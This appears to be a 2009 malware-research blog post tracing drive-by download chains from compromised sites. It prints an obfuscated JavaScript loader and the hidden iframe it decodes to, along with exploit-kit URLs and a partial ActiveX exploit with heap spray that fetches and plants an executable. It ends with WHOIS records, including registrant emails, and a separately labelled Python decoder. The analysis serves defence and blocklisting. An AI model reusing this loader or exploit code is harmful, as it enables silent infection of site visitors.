WARNING: All sites listed on this page are dangerous (live URLs with exploits) that lead to trojans being installed automatically on your computer. Do NOT visit them unless you know what you are doing. (Only the links are safe.)
The story about "Hosted JavaScript leading to .cn PDF Malware", which implicated clarafin[.]info, fabiomotor[.]cn and letomerin[.]cn, continues! New sites keep appearing as intermediaries for distributing malware.
For beebest[.]cn, I will take the domain "cmizziconstruction.com" as an example.
The diagnostic page for cmizziconstruction.com (provided by Google Safe Browsing).
In the source code we can see:
<script>
function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534()));}
function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){ var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43<h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e364724a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.substr(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;}
var r36='';
var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027'+r36+'2533632536392536362537'+r36+'32253631253664253635253230253665253631253664253635253364253633253332253337'+r36+'2532302537'+r36+'332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+'342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'342537'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36+'392532652536332536662536642532662536392536652532652537'+r36+'302536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'342536382532652537'+r36+'322536662537'+r36+'352536652536342532382534642536312537'+r36+'342536382532652537'+r36+'32253631253665253634253666253664253238253239253261253334253331253331253333253338253239253262253237'+r36+'253334253338253336253338253636253336253336253237'+r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364253333253330253337'+r36+'253230253638253635253639253637'+r36+'2536382537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+'342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'362536392537'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'39253361253638253639253634253634253635253665253237'+r36+'2533652533632532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27'+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';
alert(h49d2e364714d7(h49d2e36474be1));
</script>
The deobfuscated code is:
<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f%6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%20%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d%31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>
which is an IFRAME:
<iframe name=c27 src='hxxp://extraspray.com/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe>
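The two layers above (hex pairs decoded with parseInt(x, 16) and String.fromCharCode, then document.write(unescape('%xx...')) producing the hidden iframe) can be unwound statically, without running the script in a browser. The decoder below is an added example, not code from the page; it works on a constructed sample in the same layout (including the empty r36 joins that split the hex string) with a placeholder target example.invalid, and reports the iframe target defanged. SAMPLE_JS and all function names are assumptions.

```python
import re

# Constructed sample (not the page's payload): same loader layout as above,
# including the ''+r36+'' splits the loader uses to break up its hex string.
SAMPLE_JS = (
    "var r36='';var p='646F63756D656E742E777269746528756E6573636170652827'"
    "+r36+'253363253639253636253732253631253664253635253230'"
    "+r36+'253733253732253633253364253237'"
    "+r36+'253638253734253734253730253361253266253266'"
    "+r36+'253635253738253631253664253730253663253635253265'"
    "+r36+'253639253665253736253631253663253639253634'"
    "+r36+'253266253639253665253265253730253638253730253237253365'"
    "+r36+'253363253266253639253636253732253631253664253635253365'"
    "+r36+'2729293B';alert(decode(p));"
)

# A hex literal, optionally split as '...'+name+'...' repeatedly, up to the ';'
_HEX_EXPR = re.compile(r"=\s*('[0-9A-Fa-f]*'(?:\s*\+\s*\w+\s*\+\s*'[0-9A-Fa-f]*')*)\s*;")
_JS_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def collect_hex(js):
    """Pick the longest hex-literal expression and drop the dummy '+r36+' joins."""
    joined = ["".join(re.findall(r"'([0-9A-Fa-f]*)'", m.group(1)))
              for m in _HEX_EXPR.finditer(js)]
    return max(joined, key=len, default="")

def hex_to_source(hexstr):
    """Layer 1: what the loader's parseInt(x, 16) / String.fromCharCode loop yields."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))

def js_unescape(s):
    """Emulate JavaScript unescape(): %XX and %uXXXX each become one code point."""
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def written_html(source):
    """Layer 2: decode each document.write(unescape('...')) argument, never run it."""
    return [js_unescape(a) for a in re.findall(r"unescape\(\s*'([^']*)'\s*\)", source)]

def iframe_targets(html):
    return re.findall(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]([^'\"]+)", html, re.I)

def defang(url):
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def analyse(js):
    source = hex_to_source(collect_hex(js))
    html = written_html(source)
    return {"source": source, "html": html,
            "targets": [defang(t) for h in html for t in iframe_targets(h)]}

print(analyse(SAMPLE_JS)["targets"])  # constructed sample -> hxxp://example[.]invalid/in[.]php
```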
Analysis on March 25
hxxp://extraspray.com/in.php?
URL Analysis:
  hxxp://agkt.info/evo/getexe.exe?o=7&t=1238025784&i=2154770527&e=
  hxxp://agkt.info/evo/exploits/x19.php?o=7&t=1238025784&i=2154770527
  hxxp://agkt.info/evo/exploits/x18.php?o=7&t=1238025784&i=2154770527
  hxxp://agkt.info/evo/exploits/x21x1.php
  hxxp://agkt.info/evo/getexe.exe?o=4&t=1238025787&i=2154770527&e=
  hxxp://rifnasax.cn/nuc/exe.php (URL Analysis - VirusTotal (Kryptik))
Analysis on April 17
hxxp://extraspray.com/in.php?
URL Analysis:
  hxxp://sgqw.info/evo/getexe.exe?o=7&t=1239978315&i=2154770527&e=
  hxxp://sgqw.info/evo/exploits/x19.php?o=7&t=1239978315&i=2154770
  hxxp://sgqw.info/evo/exploits/x18.php?o=7&t=1239978315&i=2154770527
  hxxp://sgqw.info/evo/getexe.exe?o=7&t=1239978315&i=2154770527&e=18 (URL Analysis - VirusTotal - Anubis)
Now with clarafin[.]info
Analysis on April 17 (07:26)
The source code shows:
<script>if (!myia){ document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33%32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c%61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61%66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29%2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20%77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%74%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e')); } var myia = true; </script>
which is the IFRAME for clarafin[.]info:
<iframe name=c32 src='hxxp://clarafin.info/traff/index.php?'+Math.round(Math.random()*253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'></iframe>
You can follow the results for "clarafin.info" on this page: Internet Storm Center: Hosted javascript leading to .cn PDF malware
-------------
And now the new one that just appeared on the same page: beebest[.]cn
Google Diagnostic for beebest.cn: AS41665 (HOSTING)
This is just a part of the code:
function ss() {
  try{
    ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");
    var arbitrary_file = "hxxp://beebest.cn/dlutrl23dnwfas/exe.php";
    var dest = 'C:/Program Files/Outlook Express/wab.exe';
    document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
    attack.SnapshotPath = arbitrary_file;
    setTimeout('window.location = "ldap://127.0.0.1"',3000);
    attack.CompressedPath = dest;
    attack.PrintSnapshot(arbitrary_file,dest);
  }catch(e){}
}
function xml() {
  var spray = unescape("%u0a0a%u0a0a");
  do { spray += spray; } while(spray.length < 0xd0000);
  memory = new Array();
  for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }
  document.getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><!
A ThreatExpert result shows the connection to stopgam.cn and stopgam2.cn after infection:
ThreatExpert Result
It is recommended that you block these IPs using your hosts file or your firewall. These domains are also cited on the Malware Domain List (91.212.65.7), and all are still active.
hxxp://beebest.cn      | 78.109.25.215
hxxp://clarafin.info   | 212.5.74.37
hxxp://corpamata.cn    | 78.109.25.215
hxxp://extraspray.com  | 72.232.116.51
hxxp://agkt.info       |
hxxp://rifnasax.cn     | 91.212.65.7
hxxp://sgqw.info       | 85.17.136.137
hxxp://stopgam.cn      | 85.17.136.137
hxxp://stopgam2.cn     | 174.129.244.106 174.129.241.185
78.109.25.217
IP Location - Namibia - Plathost2 - Ivan Kirst
Domain Name: beebest.cn - stopgam.cn - corpamata.cn
Domain Status: ok
Registrant Organization: DomainsC
Registrant Name: MichellGregory
Administrative Email: abuse@domainsreg.cn
Sponsoring Registrar: 厦门华融盛世网络有限公司 - Xiamen Huarong Spirit Network Limited
Name Server: ns1.us.editdns.net
Name Server: ns2.us.editdns.net
Name Server: ns3.us.editdns.net
Registration Date: 2009-02-11
Expiration Date: 2010-02-11
212.5.74.37
IP Location - Russia
Domain Name: clarafin.info
Domain Status: ok
Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd
Name Server: ns1.us.editdns.net
Name Server: ns2.us.editdns.net
Name Server: ns3.us.editdns.net
Registration Date: 2009-03-18
Expiration Date: 2010-03-18
85.17.136.137
IP Location - Netherlands - LeaseWeb
Domain Name: sgqw.info
Domain Status: ok
Registrant Organization: Private person
Registrant Name: Sumir Mahadjan
Administrative Email: mahadjans9@gmail.com
Sponsoring Registrar: Regtime Ltd. (R455-LRMS)
Name Server: ns1.mtpv.info
Name Server: ns2.mtpv.info
Name Server: ns3.us.editdns.net
Registration Date: 2009-04-01
Expiration Date: 2010-01-01
72.232.116.51
IP Location - US - Layered Technologies, Inc.
Domain Name: extraspray.com
Domain Status: ok
Registrant Organization: Private person
Registrant Name: Sumir Mahadjan
Administrative Email: mahadjans9@gmail.com
Sponsoring Registrar: Regtime Ltd.
Name Server: vc11.amhost.net
Name Server: vc12.amhost.net
Registration Date: 2009-03-09
Expiration Date: 2010-03-09
174.129.244.106 174.129.241.185
IP Location - US - Amazon.com, Inc.
Domain Name: stopgam2.cn
ROID: 20090417s10001s12986159-cn
Domain Status: clientTransferProhibited
Registrant Name: Zitoclick
Administrative Email: support@zitoclick.com
Sponsoring Registrar: InamePro dba Dynadot
Name Server: ns1.dsredirection.com
Name Server: ns2.dsredirection.com
Registration Date: 2009-04-17 05:23
Expiration Date: 2010-04-17 05:23
91.212.41.119
Domain Name: tixwagoq.cn
Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. Hangzhou
Registrant Name: 周明 - Zhou
Administrative Email: suhalbuia@163.com
Sponsoring Registrar: 易名中国 - Easy Chinese
Name Server: ns1.runsdns.cn
Name Server: ns2.runsdns.cn
Registration Date: 2009-03-18 22:16
Expiration Date: 2010-03-18 22:16
inetnum: 91.212.41.0 - 91.212.41.255
netname: gaztranzitstroyinfo-net
descr: LLC "Gaztransitstroyinfo"
country: Russia
------------
91.212.65.7
IP Location - Ukraine - Eurohost LLC
Domain Name: rifnasax.cn
Registrant Organization: Yong also Import and Export Corporation
Registrant Name: 张龙 - Long
Administrative Email: alvin_555@yeah.net
Sponsoring Registrar: 易名中国 - Easy Chinese
Name Server: ns2.dnsmytruedns.com
Name Server: ns1.dnsmytruedns.com
Registration Date: 2009-02-13 19:29
Expiration Date: 2010-02-13 19:29
This IP appears to host several websites with live exploits.
91.212.65.7
hxxp://dnsmytruedns.com hxxp://hayboxiw.cn (Analysis) hxxp://paksusic.cn hxxp://paylayos.cn hxxp://peskufex.cn hxxp://porgacig.cn hxxp://qicdator.cn (Analysis) hxxp://ralcofic.cn hxxp://rifnasax.cn (Analysis) hxxp://tozxiqud.cn
91.212.41.119